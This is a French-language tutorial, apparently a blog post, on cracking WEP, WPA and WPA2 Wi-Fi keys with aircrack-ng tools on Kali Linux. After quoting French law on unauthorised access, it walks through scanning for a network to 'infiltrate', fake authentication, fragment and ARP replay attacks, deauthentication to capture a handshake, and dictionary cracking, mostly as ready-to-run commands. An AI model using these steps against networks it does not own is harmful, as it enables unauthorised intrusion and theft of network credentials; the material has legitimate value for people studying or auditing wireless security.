Cracker une clé WEP / WPA / WPA2

Dans ce tutoriel nous allons apprendre à cracker des clés Wi-Fi crypter en WEP, WPA ou WPA 2.


Légalement :

La référence légale est l'article 323-1 du Code pénal. Il stipule que:

Le fait d'accéder ou de se maintenir, frauduleusement, dans tout ou partie d'un système de traitement automatisé de données, est puni de deux ans d'emprisonnement et de 30.000 € d'amende.

Si l'intrus supprime ou modifie des données contenues dans le système, la peine passe à trois ans d'emprisonnement et 45.000 € d'amende. Le plaignant peut également se constituer partie civile afin de réclamer des dommages et intérêts.

Sources: http://www.zdnet.fr/actualites/intrusion-sur-reseau-wi-fi-jusqu-a-3-ans-d-emprisonnement-en-france-39243293.htm

 

Notions :

Le Wi-Fi est une abréviation de Wireless Fidélité, il est un ensemble de protocoles de communication sans fil. Qui permet de relier différents équipements dans un même réseau, pour qu'ils puissent communiquer. Actuellement, la norme du Wi-Fi est ISO 802.11 qui permet de communiquer avec le modèle OSI afin d'assurer une liaison sans fil en utilisant des ondes électromagnétiques.

 

Le WEP est une abréviation de Wired Equivalent Privacy, le premier protocole de sécurité mise en place pour sécuriser les réseaux sans fil. Il permet de crypter un mot de passe pour sécuriser l'accès à son réseau. Il n'est plus vraiment utilisé, car des faiblesses graves ont été identifiées par les cryptologues. 

 

Le WPA et WPA 2 est une abréviation de Wi-Fi Protected Access qui a été créée au début du 21e siècle pour répondre au sévère faiblesse du WPE. 

 

Le WPA utilise un chiffrement TKIP (Temporal Key Integrity Protocol), ce qui lui permet de chiffrer chaque paquet avec une clé de base qui est périodiquement modifiée et concaténée avec un vecteur d'initialisation.

 

Le WPA 2 quant à lui à l'avantage de prendre en compte le protocole CCMP (Counter-Mode/CBC-Mac protocol) en cryptologie le CCMP gère les clés et l'intégrité des messages personnalisée. Ce protocole s'appuie sur l'AES (Advanced Encryption Standard) et un algorithme de chiffrement symétrique, entre autres le WPA 2 avec chiffrement AES permet de crypter votre clé de connexion, via une clé secrète.

 

Prérequis :

Une machine sous Kali Linux

Une clé wifi qui permet de faire du Monitoring:

AWUS 036H
AWUS 036NH

 

Étape 1 :

Lancez l'invite de commandes en root dans Kali.

ifconfig
airmon-ng
start wlan0

 

Là vôtre carte passe en mode Monitoring 

 

Étape 2 :

Ensuite, nous allons faire un scan réseaux pour voir sur quels réseaux nous voulons infiltrer. Pour cela, il faut saisir la commande:

airodump-ng --encrypt wlan0mon

 

Il faudra laisser tourner la console pendant quelques minutes afin de voir le réseau le plus intéressant pour vous, En gros celui qui vous fourniront le plus gros nombre de #Data.

Ensuite il vous faudra noter sur un bout de papier :

Le nom ESSID (nom de la box)
L'adresse BSSID (adresse MAC de la Box)
L'adresse STATION (si disponible)
Le type d'encryptage (WEP / WPA / WPA2)
Le canal (CH) 

Puis faire un "ctrl"+"C" pour arrêter la commande.

 

Étape 3.1 :

Cette étape concerne le crack d'une clé WEP, sinon passez à l'étape 3.2.

Donc ensuite nous allons créer un fichier de capture pour cracker la clé WEP que vous aurez choisie, pour cela tapez la commande:

airodump-ng --bssid [adresse BSSID] --ch [N° du canal] --write wep-client wlan0mon

 

Lancer une nouvelle invite de commandes en root et nous allons faire croire à la box que nous sommes connectés, ce qui va nous permettre d'injecter nos paquets correctement avec la commande:

aireplay-ng --fakeauth 30 -a [adresse BSSID] wlan0mon

 

Si la commande échoue c'est soit que la box filtre les adresses MAC, soit que vous êtes trop loin de la box.

Si cela fonctionne on va lancer une attaque fragment avec la commande:

aireplay-ng --fragment -b [adresse BSSID] -r wep-client-01.cap wlan0mon

 

Quand vous verrez la phrase Got RELAYED packet!! apparaitre vous pouvez arrêter la commande avec "ctrl"+"c".

Nous allons ensuite générer un paquet ARP grâce au fichier .xor que la commande précédente nous aura fourni en faisant la commande:

packetforge-ng --arp -a [adresse BSSID] -h [votre adresse MAC de votre carte Wi-Fi] -k 192.168.1.100  -i [IP du routeur] -y fragment-xxxx-xxxxxx.xor -w arp

 

L'ip du routeur est dans la plupart des cas 192.168.1.254 ou 192.168.1.1

Maintenant nous allons injecter le paquet ARP que nous avons forgé sur la box avec la commande:

aireplay-ng --arpreplay [adresse BSSID] -r arp wlan0mon

 

Une fois l'envoi du paquet ARP effectué, saisissez la commande:

aircrack-ng wep-clien-01.cap

 

Et voilà vous obtenez la clé WEP et vous pouvez enfin vous connecter au réseau.

 

Étape 3.2 :

Cette étape concerne le crack d'une clé WPA et WPA2, sinon passés à l'étape 3.1.

Ensuite nous allons créer un fichier de capture pour cracker la clé WAP / WAP2 que vous aurez choisie, pour cela tapez la commande:

airodump-ng --write wpa-client --bssid [adresse BSSID] --ch [N° du canal] wlan0mon

 

Il faut que le handshake apparaît sur la console, pour cela il nous faut plus de Data, cela peut prendre du temps, pour ce faire il faut en attendant effectuer en parallèles les étapes suivantes:

Tout d'abord faire la commande:

aireplay-ng -0 1 -a [adresse BSSID] -h [votre adresse MAC de votre carte Wi-Fi] wlan0mon

 

Au bout d'un certain temps (de 5 minutes à quelques heures) sur votre console apparaitra en haut à droite WPA handshake: [adresse BSSID].

C'est bon vous faites "ctrl"+"c". Et nous passons à la partie décryptage de la clé, pour cela il vous faut des dictionnaires afin de comparer les clés jusqu'à trouver une  concordance avec la clé de la box. Vous trouverez comment créer vos dictionnaires à l'étape 4.

Ensuite lancer la commande:

aircrack-ng -a 2 -w [chemin de vos dictionnaires] wpa-client-01.cap

 

Une fois que la clé aura été trouvée le mot de passe sera affiché.

ATTENTION : cette opération peut prendre beaucoup de temps, je vous conseille d'utiliser un serveur ou un cloud pour importer le fichier wpa-client-01.cap et les dictionnaires, et d'exécuter la commande sur votre serveur. Un PC standard n'aura pas forcément une vitesse de calcul suffisante pour comparer les clés assez rapidement.

 

Étape 4 :

Télécharger le script  keygen.sh

Mettez le sur votre dossier /root dans Kali et exécutez le script via la commande:

./keygen.sh

 

Il vous suffit de choisir l'un des 18 modes, et de le valider avec "Entrée".

Ensuite le script vous demandera de rentrer les valeurs minimales (MIN) et maximales (MAX), ainsi que le nom du dictionnaire (FILE)

Vous saisissez:

1 20 dico0.txt

Votre dictionaire sera crée.


Il y a aussi le choix startblock qui vous permet de choisir à partir de quel mot ou quelle clé le générateur de dictionnaires commencera à créer des clés.

Voilà je pense avoir fait le tour, bon courage laugh